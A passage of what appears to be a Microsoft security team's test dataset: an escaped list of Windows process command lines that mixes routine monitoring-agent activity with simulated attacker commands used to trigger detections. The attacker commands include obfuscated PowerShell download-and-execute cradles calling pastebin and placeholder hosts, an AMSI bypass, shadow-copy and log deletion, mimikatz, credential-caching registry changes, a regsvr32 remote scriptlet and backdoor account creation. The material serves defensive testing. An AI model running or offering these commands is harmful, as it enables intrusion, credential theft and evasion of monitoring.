Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32 /C 42424.exe\",\"42424.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32 /C 1234.exe\",\"1234.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32 /C reg.exe\",\"reg.exe\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator Bob_testing /add\",\"net share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net use q: /delete\",\"net share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete\",\"net user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator /delete\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe k111\",\"implant.exe 81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe -b -t -m\",\"cmd /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1 localgroup Administrators\",\"whoami\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain\",\"net user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll\",\".\\\\reg query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg add Image File Execution Options sethc.exe\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net use v: \\\\\\\\tsclient\\\\c\",\"net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 v: /delete\",\"cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious\",\"cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe firewall set opmode mode=disable profile=all\",\"cmd /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe @ abc.com abc.wallet\",\"cmd /c echo /e:vbscript.encode /b\",\"pcalua.exe -a \\\\\\\\server\\\\payload.dll\",\"findstr /si password sysvol *.txt\",\"odbcconf.exe /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe 464 0 0x0110:40\",\"mt.exe port\",\"mt.exe smb\",\"hd.exe -pslist\",\"hd.exe -enum\",\"netsh.exe PortOpenning\",\"certutil -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32 /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 